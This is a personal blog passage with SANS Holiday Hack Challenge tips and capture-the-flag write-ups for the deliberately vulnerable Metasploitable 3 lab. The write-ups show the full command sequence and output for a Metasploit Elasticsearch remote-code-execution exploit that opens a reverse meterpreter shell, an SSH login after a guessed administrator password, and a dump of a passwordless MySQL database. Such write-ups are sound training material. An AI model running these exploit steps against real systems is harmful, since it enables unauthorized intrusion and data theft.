Thursday, December 29, 2016

SANS Holiday Hack Challenge 2016 - Tips from the North Pole Elves

Tips from the North Pole Elves

Hello again,
Long time no see.
I was working on the SANS Holiday Hack Challenge and at last I've submitted my write up today, although I couldn't find 2 NetWars coins.

I'll share my solutions once the challenge is over after January 4th.

For now, I want to share the tips that the Elves from the North Pole gave us to help with the challenges.

The Elves in the North Pole give a lot of information and tips about possible vulnerabilities that can be exploited and tools to use.

Me!

·         Alabaster Snowball:

o   Mentions JSON parameter editing
o   Recommends using BurpSuite


·         Holly Evergreen:

o   Once all the Cranberry Pi pieces are found she provides the Cranbian image.

·         Shiny Upatree:

o   Mentions APK files are just ZIP files
o   Recommends JadX-gui to decompile APK
o   Provides a link to download Joshua Wright’s presentation from HackFest 2016 on using Android Studio and JadX

·         Pepper Minstix:

o   Talks about the Meteor Framework and provides a link to the project’s web site.
o   Provides a link to Tim Medin’s blog post about using Tampermonkey and his own Meteor Miner JavaScript to exploit over subscription sharing too much data with Meteor.
o   Provides a link to download an old version of the Dungeon game.

·         Minty Candycane:

o   Mentions NMAP and how the default –sC switch really works well.
o   Mentions John the Ripper and provides a link to download the Rockyou password database for brute forcing.

·         Sugarplum Mary:

o   Mentions how PHP Filters can be used to read all kind of I/O streams.
o   Provides a link to Jeff McJunki’s blog post about exploiting local file inclusion with php filters.  

·         Bushy Evergreen:

o   Mentions apktool to decompile Android apps.
o   Says JadX is great to look at the code but not good for recompiling, but with Apktool, I can modify the smali code and recompile.
o   Reminds to signed recompiled APK files before installing.
o   Provides a link to Joshua Wright’s video about manipulating APK files with apktool.

·         Wunorse Openslae:

o    Mentions how hard it’s been to manage so many SD cards.
o    Provides link to Joshua Wright’s blog post about managing SD card images and how to mount them

The same tips and others are provided in the SantaGram app once you manage to install it and look at the post from elves.

Tip from SantaGram post

Happy Hunting! 🙂

Friday, December 16, 2016

Metasploitable 3 - Broken flags (cards)



Hello, I just got this from the Metasploitable 3 team at Rapid7:

CaptureTheFlag                                                                    1:57 PM (20 minutes ago)
to CaptureTheFlag


Hello,

You are receiving this e-mail because according to our record, you are an active participant for the Metasploitable3 CTF.

The CTF team would like to address two issues with these flags: Seven of Hearts and Jack of Diamonds,please read carefully.


Seven of Hearts

The Seven of Hearts is probably missing in your Metasploitable3 image, because we made a typo in the installation script. To make sure you have this card, you can either:
Rebuild the image by doing:
1. In your repository, do "git pull" to update
2. Do: "vagrant destroy"
3. Do: "vagrant up", and this should rebuild the image. It will take a while. 

Or update and run install_flags.bat (without the need to rebuild the image, so this is quicker)
1. wget https://raw.githubusercontent.com/rapid7/metasploitable3/master/scripts/installs/install_flags.bat
2. In the Metasploitable3 repo, move the new install_flags.bat file to the scripts/installs/ directory. This should replace the old one.
3. On Virtual Box, log on to Metasploitable3 as vagrant:vagrant.
4. Go to C:\vagrant\scripts\installs. Right click on the install_flags.bat file, and run it as an administrator, and Seven of Hearts should be installed. 

Jack of Diamonds
You are only able to extract the Jack of Diamonds image partially. However, if the approach to finding this flag is correct, we will still give you full credit. So please don't ignore this flag.

Other flags are in good working condition. We are sorry for the inconvenience. If you have any questions, please let us know.


Thank you!

The Metasploitable3 CTF Team

Sunday, December 11, 2016

Here we go again! THE 2016 SANS HOLIDAY HACK CHALLENGE


The SANS Institute just published the 2016 SANS HOLIDAY HACK CHALLENGE!

Good luck everyone!

https://twitter.com/SANSPenTest/status/808059170696101888


THE 2016 SANS HOLIDAY HACK CHALLENGE

The Seven of Spades

Metasplopitable 3


The Seven of Spades

Once I guessed the Administrator user's password I was able to login through SSH in the Metasploitable3 server

root@igor-kali:~# ssh Administrator@10.20.10.19
Administrator@10.20.10.19's password:
Permission denied, please try again.
Administrator@10.20.10.19's password:
-sh-4.3$
-sh-4.3$ pwd

/cygdrive/c/Users/Administrator

I started navigating through the folders and ended up in Users/Public/Documents and looking at the list of file I found a PDF file.

-sh-4.3$ cd Public
-sh-4.3$ ls
Desktop  Documents  Downloads  Favorites  Libraries  Music  Pictures  Videos  desktop.ini
-sh-4.3$ cd Documents/
-sh-4.3$ ls
My Music  My Pictures  My Videos  desktop.ini  jack_of_hearts.docx  seven_of_spades.pdf

I downloaded the file using scp

root@igor-kali:~# scp Administrator@10.20.10.19:/cygdrive/c/Users/Public/Documents/seven_of_spades.pdf .
Administrator@10.20.10.19's password:
seven_of_spades.pdf                                        100%  494KB   2.9MB/s   00:00  

Bu it looks like this:


Original PDF File

So I use pdf-parser to look at the image and noticed to images embedded


root@igor-kali:~/seven_of_spades# pdf-parser -w seven_of_spades.pdf |less


obj 7 0
 Type: /XObject
 Referencing: 8 0 R
 Contains stream

  <<
    /Type /XObject
    /Subtype /Image
    /Height 729
    /Width 521
    /BitsPerComponent 8
    /ColorSpace /DeviceRGB
    /SMask 8 0 R
    /Length 498422
    /Filter [/FlateDecode]
    /DecodeParms
      <<
        /Predictor 15
        /Colors 3
        /BitsPerComponent 8
        /Columns 521
      >>
    ]
  >>


obj 8 0
 Type: /XObject
 Referencing:
 Contains stream

  <<
    /Type /XObject
    /Subtype /Image
    /Height 729
    /Width 521
    /BitsPerComponent 8
    /ColorSpace /DeviceGray
    /Decode [0 1]
    /Length 5636
    /Filter [/FlateDecode]
    /DecodeParms
      <<
        /Predictor 15
        /Colors 1
One of them is RGB and the other is in Gray Scale so it must be the RGB one.

I extracted the two images using pdfextract but this didn't work well.


Object 7


Object 8


But no worries, twitter helped...

So that's what I did

root@igor-kali:~/seven_of_spades# pdfimages -all -p seven_of_spades.pdf .
root@igor-kali:~/seven_of_spades# ls -al
total 984
drwxr-xr-x  2 root root   4096 Dec 15 20:25 .
drwxr-xr-x 31 root root   4096 Dec 15 20:44 ..
-rw-r--r--  1 root root 481272 Dec 15 20:25 .-001-000.png
-rw-r--r--  1 root root   4730 Dec 15 20:25 .-001-001.png
-rwxr-x---  1 root root 505608 Dec 10 00:28 seven_of_spades.pdf


root@igor-kali:~/seven_of_spades# file .*.png
.-001-000.png: PNG image data, 521 x 729, 8-bit/color RGB, non-interlaced
.-001-001.png: PNG image data, 521 x 729, 8-bit grayscale, non-interlaced



The file was extracted to the .-001-000.png file


Thursday, December 8, 2016

The Ace of Hearts

Metasploitable 3



The Ace of Hearts


With the Ten of Diamonds, we also downloaded the Ace of Hearts, this time a JPEG file, let's take a look


Not the card we are looking for

Ok, this is not what we're looking for, I guess we want PNG files, let's take a closer look to the file with binwalk


root@igor-kali:~# binwalk ace_of_hearts.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20087         0x4E77          Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png
480150        0x75396         End of Zip archive

Bingo, there's a Zip file attached to the JPEG file that has a ace_of_hearts.png file inside

Some people will extract the ZIP file with 'dd' or with 'foremost' but I'll just make a copy and rename to zip and unzip it (you can also unzip directly).


root@igor-kali:~# cp ace_of_hearts.jpg ace_of_hearts.jpg.zip
root@igor-kali:~# unzip ace_of_hearts.jpg.zip 
Archive:  ace_of_hearts.jpg.zip
warning [ace_of_hearts.jpg.zip]:  20087 extra bytes at beginning or within zipfile
  (attempting to process anyway)
 extracting: ace_of_hearts.png       


The Ace of Hearts

The Ten of Diamonds

Metasploitable 3

The Ten of Diamonds:

We go back to our meterpreter thanks to Elasticsearch and run a search:

meterpreter > pwd
C:\Program Files\elasticsearch-1.1.1
meterpreter > cd c:\
meterpreter > search
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc
meterpreter > pwd
C:\
meterpreter > search -f *diamonds*
Found 6 results...
    C:\jack_of_diamonds.png
    C:\Program Files\OpenSSH\home\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\Users\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\ten_of_diamonds.png (406134 bytes)
meterpreter > 

if we start a shell and look at the     folder we can see it's a SYMLINK to C:\Users


meterpreter > shell
Process 1 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\elasticsearch-1.1.1>cd\Program Files
cd\Program Files

C:\Program Files>cd OpenSSH
cd OpenSSH

C:\Program Files\OpenSSH>dir
dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 1475-561C

 Directory of C:\Program Files\OpenSSH

11/25/2016  09:59 PM    <DIR>          .
11/25/2016  09:59 PM    <DIR>          ..
11/25/2016  09:59 PM    <DIR>          bin
11/25/2016  09:59 PM    <DIR>          docs
11/25/2016  09:59 PM    <DIR>          etc
11/25/2016  09:59 PM    <JUNCTION>     home [\??\C:\Users]
11/25/2016  09:59 PM                67 openssh.url
11/25/2016  09:59 PM    <JUNCTION>     tmp [\??\C:\Windows\Temp]
11/25/2016  09:59 PM           104,308 uninstall.exe
11/25/2016  09:59 PM    <DIR>          usr
11/25/2016  09:59 PM    <DIR>          var
               2 File(s)        104,375 bytes
               9 Dir(s)  47,950,204,928 bytes free

C:\Program Files\OpenSSH>

This means that the Ten of Diamonds can be also found by getting an SSH session on TCP port 22:

10.20.10.19  22     tcp    ssh         open   OpenSSH 7.1 protocol 2.0
But I'm gonna stick with the meterpreter, it seems it has all I need to find cards for know.
OK, we know where the Ten of Diamonds is, let's get it

meterpreter > ls
Listing: C:\Program Files\OpenSSH\home\Public\Pictures
======================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40776/rwxrwxrw-   0       dir   2009-07-14 00:57:55 -0400  Sample Pictures
100776/rwxrwxrw-  480172  fil   2016-11-25 20:47:41 -0500  ace_of_hearts.jpg
100777/rwxrwxrwx  380     fil   2009-07-14 00:57:55 -0400  desktop.ini
100776/rwxrwxrw-  406134  fil   2016-11-25 20:47:42 -0500  ten_of_diamonds.png

meterpreter > pwd
C:\Program Files\OpenSSH\home\Public\Pictures

meterpreter > download ten_of_diamonds.png
[*] downloading: ten_of_diamonds.png -> ten_of_diamonds.png
[*] skipped    : ten_of_diamonds.png -> ten_of_diamonds.png

and look at that, we also found the Ace of Hearts, so we'll get it also

meterpreter > download ace_of_hearts.jpg
[*] downloading: ace_of_hearts.jpg -> ace_of_hearts.jpg
[*] download   : ace_of_hearts.jpg -> ace_of_hearts.jpg

OK, let's see what Linux think of these files:

root@igor-kali:~# file ten_of_diamonds.png ace_of_hearts.jpg 
ten_of_diamonds.png: data
ace_of_hearts.jpg:   JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 342x500, frames 3
root@igor-kali:~# 

Hmm.. something odd with that ten_of_diamonds.png, it should say PNG image etc... but instead it says just data
root@igor-kali:~# display ten_of_diamonds.png 
display: improper image header `ten_of_diamonds.png' @ error/png.c/ReadPNGImage/3930.
ImageMagick didn't like it either, let's take a closer look

Croot@igor-kali:~# binwalk ten_of_diamonds.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
62            0x3E            Zlib compressed data, best compression

Ok, so binwalk can see the compressed data that we can usually find in a PNG file but not the PNG headers.
A normal PNG file will start something like this one (The Joker card)

root@igor-kali:~# hexdump -C  data.bin | head -10
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 02 09 00 00 02 d9  08 06 00 00 00 3d 5c b2  |.............=\.|
00000020  d7 00 00 00 09 70 48 59  73 00 00 17 11 00 00 17  |.....pHYs.......|
00000030  11 01 ca 26 f3 3f 00 00  20 00 49 44 41 54 78 da  |...&.?.. .IDATx.|
00000040  ec bd 59 ac 6d d9 75 1d  36 d6 da cd 39 fb f4 b7  |..Y.m.u.6...9...|
00000050  7d ef be a6 1a 16 59 65  76 a2 15 59 2a 35 96 ac  |}.....Yev..Y*5..|
00000060  40 51 e2 0f c7 04 12 21  00 03 04 d6 17 7f f4 61  |@Q.....!.......a|
00000070  7d 18 f9 d2 87 03 27 bf  01 81 c0 11 cc 2f 59 56  |}.....'....../YV|
00000080  24 21 a0 25 c8 89 13 38  08 0c 27 4e 24 53 4d 44  |$!.%...8..'N$SMD|
00000090  aa 28 16 ab 2f d6 ab d7  dd f6 9c 7b 9a dd af 95  |.(../......{....|

But the Ten of Diamonds starts like this instead:

root@igor-kali:~# hexdump -C ten_of_diamonds.png | head -10
00000000  89 4d 53 46 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.MSF........IHDR|
00000010  00 00 02 09 00 00 02 d9  08 06 00 00 00 3d 5c b2  |.............=\.|
00000020  d7 00 00 00 09 70 48 59  73 00 00 17 11 00 00 17  |.....pHYs.......|
00000030  11 01 ca 26 f3 3f 00 00  20 00 49 44 41 54 78 da  |...&.?.. .IDATx.|
00000040  ec bd 69 ac 6d 5b 76 1e  34 e6 9c ab dd dd d9 a7  |..i.m[v.4.......|
00000050  bd ed 7b f7 bd aa 72 55  dc 05 39 06 0a 90 82 0b  |..{...rU..9.....|
00000060  1c 8b 20 05 15 90 44 22  42 20 23 21 0b 11 a1 58  |.. ...D"B #!...X|
00000070  28 20 42 8c 14 cb 41 b4  42 f5 07 ac 58 08 2c 43  |( B...A.B...X.,C|
00000080  59 c2 29 70 1c 0b 82 88  64 47 18 6c d9 09 55 b6  |Y.)p....dG.l..U.|
00000090  cb 7e 55 e5 7a af 5e 7f  9b 73 ee 39 67 f7 7b 75  |.~U.z.^..s.9g.{u|
It says MSF instead of PNG, I doubt this is an email file, let's edit it and replace that MSF for a PNG

root@igor-kali:~# hexeditor ten_of_diamonds.png 
Before:

We open the manual for ascii to look for the HEX equivalent for P(0x50) N(0x4E) and G(0x47) so we replace M(0x4D) S(0x53) and F(0x46)
After


Ctrl+X to Save and we save it with another name in case we broke something :)
root@igor-kali:~# file ten_of_diamonds-PNG.png 
ten_of_diamonds-PNG.png: PNG image data, 521 x 729, 8-bit/color RGBA, non-interlaced

That seemed to have worked, let's take a look
The Ten of Diamonds

The Jack of Clubs

Metasploitable 3



The Jack of clubs


Remember I found this while troubleshooting the Queen of Hearts issue?

meterpreter > search -f jack*.png
Found 3 results...
    C:\jack_of_diamonds.png
    C:\Windows\System32\jack_of_clubs.png (523644 bytes)
    C:\vagrant\resources\flags\jack_of_clubs.png (523644 bytes)




Let's go download it

meterpreter > cd Windows
meterpreter > cd System32
meterpreter > pwd
C:\Windows\System32

meterpreter > download C:\Windows\System32\jack_of_clubs.png
[*] downloading: jack_of_clubs.png -> jack_of_clubs.png
[*] download   : jack_of_clubs.png -> jack_of_clubs.png


Done!



Monday, December 5, 2016

The Queen of Hearts

Metasploitable 3

The Queen of Hearts:

Ok, I want a shell now... Wordpress might give me one but let's look at another interesting port:

9200/tcp  open  http       Elasticsearch REST API 1.1.1 (name: Ziggy Pig; Lucene 4.7)

I'm a Splunk guy, so let's hit Elasticsearch :D

I have no idea what to do with Elasticsearch so let's google


Metasploit has something for Elasticsearch

Let's load msfconsole and search for Elasticsearch:

msf  > search elasticsearch

Matching Modules
================

   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   auxiliary/scanner/elasticsearch/indices_enum                       normal     ElasticSearch Indices Enumeration Utility
   auxiliary/scanner/http/elasticsearch_traversal                     normal     ElasticSearch Snapshot API Directory Traversal
   exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  ElasticSearch Dynamic Script Arbitrary Java Execution
   exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  ElasticSearch Search Groovy Sandbox Bypass
   exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

Arbitrary Java Execution.... let's use that:

msf > use exploit/multi/elasticsearch/script_mvel_rce
msf exploit(script_mvel_rce) > options

Module options (exploit/multi/elasticsearch/script_mvel_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        9200             yes       The target port
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       The path to the ElasticSearch REST API
   VHOST                         no        HTTP server virtual host
   WritableDir  /tmp             yes       A directory where we can write files (only for *nix environments)


Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.1.1 / Automatic



msf exploit(script_mvel_rce) > set RHOST 10.20.10.19
RHOST => 10.20.10.19
msf exploit(script_mvel_rce) > run

[*] Started reverse TCP handler on 10.20.10.21:4444 
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\XTepm.jar' on the target
[*] Exploit completed, but no session was created.

What?!?! Hmmm... I tried several times and no luck, so I google for metasploit and elasticsearch again and found the video:




It works for him so I asked...


Thanks Webpwnized guy :)

OK... the old turn it off and turn it on again...



msf exploit(script_mvel_rce) > run

[*] Started reverse TCP handler on 10.20.10.21:4467 
[*] Trying to execute arbitrary Java...
[*] Trying to execute 'System.getProperty("java.version")'...
[*] Answer to Java test: ;C:\Program Files\elasticsearch-1.1.1/lib/elasticsearch-1.1.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/elasticsearch-1.1.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/jna-3.3.0.jar;C:\Program Files\elasticsearch-1.1.1/lib/jts-1.13.jar;C:\Program Files\elasticsearch-1.1.1/lib/log4j-1.2.17.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-analyzers-common-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-codecs-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-core-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-grouping-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-highlighter-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-join-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-memory-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-misc-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-queries-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-queryparser-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-sandbox-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-spatial-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-suggest-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/spatial4j-0.4.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/sigar/sigar-1.6.4.jar
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (46089 bytes) to 10.20.10.19
[*] Meterpreter session 1 opened (10.20.10.21:4467 -> 10.20.10.19:49359) at 2016-12-05 18:23:56 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\cau.jar' on the target

meterpreter > ls
Listing: C:\Program Files\elasticsearch-1.1.1
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100776/rwxrwxrw-  11358  fil   2014-02-12 12:35:54 -0500  LICENSE.txt
100776/rwxrwxrw-  150    fil   2014-03-25 19:38:22 -0400  NOTICE.txt
100776/rwxrwxrw-  8093   fil   2014-03-25 19:38:22 -0400  README.textile
40776/rwxrwxrw-   4096   dir   2014-04-16 18:28:54 -0400  bin
40776/rwxrwxrw-   0      dir   2014-04-16 18:28:54 -0400  config
40776/rwxrwxrw-   0      dir   2016-11-25 22:53:28 -0500  data
40776/rwxrwxrw-   8192   dir   2014-04-16 18:28:54 -0400  lib
40776/rwxrwxrw-   8192   dir   2016-12-05 18:14:00 -0500  logs

Got it, now we have a meterpreter, let's look around:

meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\elasticsearch-1.1.1>whoami
whoami
nt authority\system

Cool, I have some power


C:\Program Files\elasticsearch-1.1.1\logs>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo              
ben_kenobi               boba_fett                c_three_pio              
chewbacca                darth_vader              greedo                   
Guest                    han_solo                 jabba_hutt               
jarjar_binks             kylo_ren                 lando_calrissian         
leah_organa              luke_skywalker           sshd                     
sshd_server              vagrant                  
The command completed with one or more errors.


I sense a theme on these users, Have you felt it?!
We got some accounts to play with later, maybe.

Let's keep looking at the folders:


C:\Program Files\elasticsearch-1.1.1\logs>cd\ 
cd\

C:\>dir
dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 1475-561C

 Directory of C:\

11/25/2016  07:33 PM    <DIR>          glassfish
11/25/2016  07:25 PM    <DIR>          inetpub
11/25/2016  07:54 PM                 0 jack_of_diamonds.png
11/25/2016  07:50 PM               103 java0.log
11/25/2016  07:50 PM               103 java1.log
11/25/2016  07:50 PM               103 java2.log
11/25/2016  07:48 PM    <DIR>          ManageEngine
11/25/2016  07:37 PM    <DIR>          openjdk6
07/13/2009  07:20 PM    <DIR>          PerfLogs
11/25/2016  07:53 PM    <DIR>          Program Files
11/25/2016  07:48 PM    <DIR>          Program Files (x86)
11/25/2016  07:54 PM    <DIR>          tmp
11/25/2016  07:38 PM    <DIR>          tools
11/25/2016  07:25 PM    <DIR>          Users
11/25/2016  07:32 PM    <SYMLINKD>     vagrant [\\vboxsrv\vagrant]
11/25/2016  07:36 PM    <DIR>          wamp
11/25/2016  07:54 PM    <DIR>          Windows
10/07/2015  06:22 PM               226 __Argon__.tmp
               5 File(s)            535 bytes
              13 Dir(s)  48,041,852,928 bytes free
 
OK, it seems I've found the Jack of Diamonds but the file is empty, not sure what's going on here.


C:\>cd Program Files
cd Program Files

C:\Program Files>dir
dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 1475-561C

 Directory of C:\Program Files

11/25/2016  07:53 PM    <DIR>          .
11/25/2016  07:53 PM    <DIR>          ..
11/25/2016  07:24 PM    <DIR>          7-Zip
11/25/2016  07:31 PM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
11/25/2016  07:53 PM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
11/25/2016  07:31 PM    <DIR>          Java
11/25/2016  07:34 PM    <DIR>          jenkins
11/25/2016  07:38 PM    <DIR>          jmx
11/25/2016  09:59 PM    <DIR>          OpenSSH
11/25/2016  09:59 PM    <DIR>          Oracle
11/25/2016  07:46 PM    <DIR>          Rails_Server
11/25/2016  07:25 PM    <DIR>          Reference Assemblies
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
11/25/2016  07:36 PM    <DIR>          wordpress
               0 File(s)              0 bytes
              17 Dir(s)  48,041,799,680 bytes free

C:\Program Files>cd wordpress
cd wordpress

C:\Program Files\wordpress>dir
dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 1475-561C

 Directory of C:\Program Files\wordpress

11/25/2016  07:36 PM    <DIR>          .
11/25/2016  07:36 PM    <DIR>          ..
11/25/2016  05:48 PM             2,432 update_ip.ps1
               1 File(s)          2,432 bytes
               2 Dir(s)  48,041,799,680 bytes free

C:\Program Files\wordpress>type update_ip.ps1
type update_ip.ps1

...
$cmd = 'C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "...
....

Aha! MySQL, root user and no password setup... let's try that:

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "show databases"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "show databases"
Database
information_schema
cards
mysql
performance_schema
test
wordpress

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;"
Tables_in_cards
queen_of_hearts

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;select * from queen_of_hearts;"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;select * from queen_of_hearts;"
Tables_in_cards
queen_of_hearts
card
iVBORw0KGgoAAAANSUhEUgAAAgkAAALZCAYAAAA9XLLXAAAACXBIWXMAABcRAAAXEQHKJvM/AAAgAElEQVR42uy9Waxt2XUdNtZauz39ue27r6ti....
....
1HTEqnJMwtap0tNueIat8JActYbNMNUSRT7dj3HF2lXTOTLyhLlupD53M95t+oDIFIUZCP6AiaG0nZDmkhEoSprbZXSvBlrOCqixILmalkSUk
xW63w+wVx8cr+q7DFRVKQT2f5c+sCDGwz5Ha1oirawwRjTjUivolUjgZKRhrsSlHY6fI0PfsuxZjnMTFjz4bWr7Hq/Umn2kLjg8P5LMrUc9crdcSS
IUEchVFiSFibYG1xSRNH3lYLnvljD4Jsb3M/LXs4nNjbx+xdZ/RpJPjW/l9zZ57TpN/cvT6UdkbfnV0krlwxXNn9uV6P3ly/KX2Sej/8Z+81H/1nW
X5H/zSu/zC8oeSsyCEHo1zDh10NiXRJC/hQ1oZSic3fut7UClLfeJEhNnudigQQiCZODRp/KVYStl7IIRADImQN1CVJUGDj+wud+yaFqM1r7/1Hpd
Xe/ogEiOt4c7pIVdXO9oMPZ4eHfHg4SU/+ZmPEULkj7/xFs6VEoaS4M6tJX/3f/j7/M+/+U/Ef387cHqyYrWaTe89eoFJ+14ITCkq3n77KVXepOqq
EIKX4MM4bZnPCxbzetJJazQXF3vu35Wi7bVXX+J7bz9gtMXf7nqMctzMW0lZLhXU6CcPgxqwbrxldDb3ypHD1qJUJGb5Ytd5NG6C85zJG742pDyeG
vqA95423+AMPd6nye63XtSisc+7fNu0ohtWCmI2nNJiK22MmsiqoY2YRt7
Wow! I've found another blob of data, this time it looks like base64
Maybe it looks better in a picture

That's a long string again
But this time is not HEX
Let's get it to see what it is:

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -sN -u root --password="" -e "use cards;select card from queen_of_hearts;" > queen_of_hearts.b64
One problem, this text doesn't end with "=" like a base64 should.

Let's download it to Kali:


meterpreter > dir
Listing: C:\Program Files\elasticsearch-1.1.1
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100776/rwxrwxrw-  11358  fil   2014-02-12 12:35:54 -0500  LICENSE.txt
100776/rwxrwxrw-  150    fil   2014-03-25 19:38:22 -0400  NOTICE.txt
100776/rwxrwxrw-  8093   fil   2014-03-25 19:38:22 -0400  README.textile
40776/rwxrwxrw-   4096   dir   2014-04-16 18:28:54 -0400  bin
40776/rwxrwxrw-   0      dir   2014-04-16 18:28:54 -0400  config
40776/rwxrwxrw-   0      dir   2016-11-25 22:53:28 -0500  data
40776/rwxrwxrw-   8192   dir   2014-04-16 18:28:54 -0400  lib
40776/rwxrwxrw-   8192   dir   2016-12-05 18:14:00 -0500  logs
100776/rwxrwxrw-  65537  fil   2016-12-05 19:24:37 -0500  queen_of_hearts.b64

meterpreter > download queen_of_hearts.b64
[*] downloading: queen_of_hearts.b64 -> queen_of_hearts.b64
[*] download   : queen_of_hearts.b64 -> queen_of_hearts.b64

Since I'm guessing this is base64, I have to add an "=" at the end of the line of the file, after that:

root@igor-kali:~# cat queen_of_hearts.b64 | base64 -d > queen_of_hearts.bin
root@igor-kali:~# file queen_of_hearts.bin 
queen_of_hearts.bin: PNG image data, 521 x 729, 8-bit/color RGBA, non-interlaced
root@igor-kali:~# 

Ok that worked... let's see it

root@igor-kali:~# display queen_of_hearts.bin
display: Expected 8192 bytes; found 8069 bytes `queen_of_hearts.bin' @ warning/png.c/MagickPNGWarningHandler/1671.
display: Read Exception `queen_of_hearts.bin' @ error/png.c/MagickPNGErrorHandler/1645.
display: corrupt image `queen_of_hearts.bin' @ error/png.c/ReadPNGImage/3978.

Oops! ImageMagic didn't like it, let's open it with a good old double click:
root@igor-kali:~# mv queen_of_hearts.bin queen_of_hearts.png
Something is wrong!
The base64 blolb is broken, I tried different ways to get a copy from MySQL and still got this. so I moved on.
Then I found the Vagrant folder with the flags (these are not the ones you have to capture, but the original ones used by vagrant):
I used meterpreter to search for files with certain card words:
meterpreter > search -f jack*.png
Found 3 results...
    C:\jack_of_diamonds.png
    C:\Windows\System32\jack_of_clubs.png (523644 bytes)
    C:\vagrant\resources\flags\jack_of_clubs.png (523644 bytes)
So let's look into the vagrant folder:
Listing: C:\vagrant\resources\flags
===================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100776/rwxrwxrw-  480172   fil   2016-11-25 20:47:41 -0500  ace_of_hearts.jpg
100776/rwxrwxrw-  550302   fil   2016-11-25 20:47:41 -0500  four_of_clubs.wav
100776/rwxrwxrw-  34251    fil   2016-11-25 20:47:41 -0500  hahaha.jpg
100776/rwxrwxrw-  523644   fil   2016-11-25 20:47:41 -0500  jack_of_clubs.png
100776/rwxrwxrw-  676796   fil   2016-11-25 20:47:41 -0500  jack_of_hearts.docx
100776/rwxrwxrw-  1116928  fil   2016-11-25 20:47:41 -0500  joker.html
100776/rwxrwxrw-  728672   fil   2016-11-25 20:47:42 -0500  queen_of_hearts.sql
